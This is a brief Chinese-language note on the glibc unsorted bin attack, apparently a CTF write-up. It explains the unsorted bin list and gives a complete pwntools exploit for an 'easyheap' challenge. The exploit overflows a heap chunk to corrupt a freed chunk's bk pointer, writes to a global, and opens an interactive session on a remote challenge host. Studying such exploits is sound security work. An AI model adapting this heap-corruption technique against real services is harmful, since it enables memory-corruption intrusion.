unsortbin attack

 

 Unsorted Bin 双向循环链表,先进先出

如果unsorted bin中只有一个chunk的话，chunk的fd、bk指针都指向main_arena+偏移：

https://mp.weixin.qq.com/s/1KhiulR-webHsBZhUzQzKg

https://blog.csdn.net/qq_36495104/article/details/106246762

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45

from pwn import * import sys import time     #context.log_level='debug'   #p=process("./easyheap") p=remote("redirect.do-not-trust.hacking.run",10413) e=ELF("./easyheap")   #context.terminal=["gnome-terminal","-x","sh","-c"] #gdb.attach(p)   def create(size,content):     p.sendlineafter("Your choice :","1")     p.sendlineafter("Size of Heap : ",str(size))     p.sendlineafter("Content of heap:",content)   def edit(index,size,content):     p.sendlineafter("Your choice :","2")     p.sendlineafter("Index :",str(index))     p.sendlineafter("Size of Heap : ",str(size))     p.sendlineafter("Content of heap : ",content)     def delete(index):     p.sendlineafter("Your choice :","3")     p.sendlineafter("Index :",str(index))   fd=0 magic=0x6020c0   #start to attack create(0x10,"a"*0x10) create(0x80,"b"*0x80) create(0x80,"c"*0x80)   delete(1) payload="d"*0x18+p64(0x91)+p64(fd)+p64(magic-0x10) edit(0,0x30,payload) create(0x80,"aaa")   p.sendlineafter(":",str(4869)) p.interactive()